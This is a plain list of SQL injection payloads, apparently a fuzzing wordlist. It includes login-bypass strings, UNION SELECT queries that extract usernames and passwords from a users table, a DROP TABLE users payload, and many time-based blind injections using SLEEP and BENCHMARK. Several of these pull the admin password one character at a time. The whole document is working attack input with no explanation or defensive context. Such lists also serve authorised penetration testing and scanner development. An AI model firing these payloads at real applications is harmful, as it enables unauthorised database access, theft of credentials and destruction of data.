' OR '1'='1' --
'or 1=1 --
'or 1=1 --' LIMIT 1
' OR '1'='1
' OR '1'='1' --
' OR '1'='1' /*
' OR ''='
' UNION SELECT NULL, username, password FROM users --
' OR '1'='1' LIMIT 1 --
'; DROP TABLE users; --
'; --
admin' --
' AND '1'='1' --
' AND '1'='2' --
' AND 1=2 --
' OR 1=1 --
' OR 1=1#
' OR 1=1/*
' OR 'a'='a
' AND 1=1 --
' OR 'x'='x
' OR 1=1 --
' OR 1=1/*
' AND 1=1 --
' AND 1=1#
' OR 'abc'='abc
' UNION SELECT 1,2,3,4,5 --
' AND 1=2 --
' OR 1=1 LIMIT 1 --
' OR 'a'='b
' OR 1=1# --
' OR 'a'='a' --
' OR '1'='1' --+
' OR '1'='1' /*
' OR 1=1 -- --
' UNION SELECT NULL, password FROM users WHERE username = 'admin' --
' AND email = 'x' AND password LIKE '%a%' --
' AND id = 1 --
' AND username = 'admin' --
' OR username = 'admin' --
' OR username LIKE 'admin%' --
' UNION SELECT 1,2,3 --
' AND username = 'admin' --
' AND password LIKE 'password%' --
' OR id=1 --
' OR username LIKE 'admin%' --
' UNION SELECT * FROM users WHERE username='admin' --
' OR email LIKE '%@gmail.com%' --
' AND username='admin' AND password='password' --
' UNION SELECT username, password FROM users --
' AND 1=1' --
' OR 1=1 --
' AND 'a'='a --
' OR '1'='1'; --
' OR 1=1/* --
' OR SLEEP(5) --
' AND 1=1 SLEEP(5) --
' OR IF(1=1, SLEEP(5), 0) --
' OR BENCHMARK(1000000,MD5(1)) --
' OR 1=1 AND SLEEP(5) --
' AND 1=1; SLEEP(5) --
' OR 1=1; BENCHMARK(1000000,MD5(1)) --
' OR 1=1; SLEEP(5) --
' OR 1=1 AND BENCHMARK(1000000,MD5(1)) --
' AND 1=1 OR SLEEP(5) --
' OR SLEEP(5) AND 1=1 --
' AND SLEEP(5) -- 
' OR IF(1=1, SLEEP(10), 0) --
' OR IF(1=1, BENCHMARK(1000000,MD5(1)), 0) --
' AND IF(1=1, SLEEP(10), 0) --
' AND IF(1=1, BENCHMARK(1000000,MD5(1)), 0) --
' OR IF(1=1, SLEEP(15), 0) --
' OR BENCHMARK(1000000, MD5(1)) AND 1=1 --
' OR BENCHMARK(1000000, MD5('test')) --
' AND BENCHMARK(1000000, MD5(1)) --
' AND BENCHMARK(1000000, MD5('test')) --
' OR 1=1; IF(1=1, SLEEP(5), 0) --
' OR 1=1; IF(1=1, BENCHMARK(1000000, MD5(1)), 0) --
' OR 1=1 AND SLEEP(5) --
' OR SLEEP(5) AND 1=1 --
' AND BENCHMARK(1000000, MD5('test')) --
' OR IF(1=1, SLEEP(5), 0) --
' AND IF(1=1, SLEEP(10), 0) --
' OR IF(1=1, SLEEP(10), 0) --
' OR IF(1=1, BENCHMARK(1000000, MD5(1)), 0) --
' OR BENCHMARK(1000000, MD5('test')) --
' OR IF(ASCII(SUBSTRING((SELECT username FROM users LIMIT 1), 1, 1))=97, SLEEP(5), 0) --
' OR IF(ASCII(SUBSTRING((SELECT username FROM users LIMIT 1), 1, 1))=97, SLEEP(5), 0) --
' OR IF(ASCII(SUBSTRING((SELECT username FROM users LIMIT 1), 2, 1))=98, SLEEP(5), 0) --
' OR IF(ASCII(SUBSTRING((SELECT username FROM users LIMIT 1), 3, 1))=99, SLEEP(5), 0) --
' OR IF(ASCII(SUBSTRING((SELECT username FROM users LIMIT 1), 4, 1))=100, SLEEP(5), 0) --
' OR IF(ASCII(SUBSTRING((SELECT username FROM users LIMIT 1), 5, 1))=101, SLEEP(5), 0) --
' OR IF(ASCII(SUBSTRING((SELECT username FROM users LIMIT 1), 6, 1))=102, SLEEP(5), 0) --
' OR IF(ASCII(SUBSTRING((SELECT username FROM users LIMIT 1), 7, 1))=103, SLEEP(5), 0) --
' OR IF(ASCII(SUBSTRING((SELECT username FROM users LIMIT 1), 8, 1))=104, SLEEP(5), 0) --
' OR IF(ASCII(SUBSTRING((SELECT username FROM users LIMIT 1), 9, 1))=105, SLEEP(5), 0) --
' OR IF(ASCII(SUBSTRING((SELECT username FROM users LIMIT 1), 10, 1))=106, SLEEP(5), 0) --
' OR IF(LENGTH((SELECT username FROM users LIMIT 1))=5, SLEEP(5), 0) --
' OR IF(LENGTH((SELECT username FROM users LIMIT 1))=6, SLEEP(5), 0) --
' OR IF(LENGTH((SELECT username FROM users LIMIT 1))=7, SLEEP(5), 0) --
' OR IF(SUBSTRING((SELECT username FROM users LIMIT 1), 1, 1)='a', SLEEP(5), 0) --
' OR IF(SUBSTRING((SELECT username FROM users LIMIT 1), 2, 1)='b', SLEEP(5), 0) --
' OR IF(SUBSTRING((SELECT username FROM users LIMIT 1), 3, 1)='c', SLEEP(5), 0) --
' OR IF(SUBSTRING((SELECT username FROM users LIMIT 1), 4, 1)='d', SLEEP(5), 0) --
' OR IF(SUBSTRING((SELECT username FROM users LIMIT 1), 5, 1)='e', SLEEP(5), 0) --
' OR IF(ASCII(SUBSTRING((SELECT password FROM users WHERE username='admin'), 1, 1))=97, SLEEP(5), 0) --
' OR IF(ASCII(SUBSTRING((SELECT password FROM users WHERE username='admin'), 2, 1))=98, SLEEP(5), 0) --
' OR IF(EXISTS(SELECT * FROM users WHERE username='admin' AND password='1234'), SLEEP(5), 0) --
' OR IF(ASCII(SUBSTRING((SELECT username FROM users WHERE user_id=1), 1, 1))=65, SLEEP(5), 0) --
' OR IF(SUBSTRING((SELECT username FROM users WHERE user_id=1), 2, 1)='b', SLEEP(5), 0) --
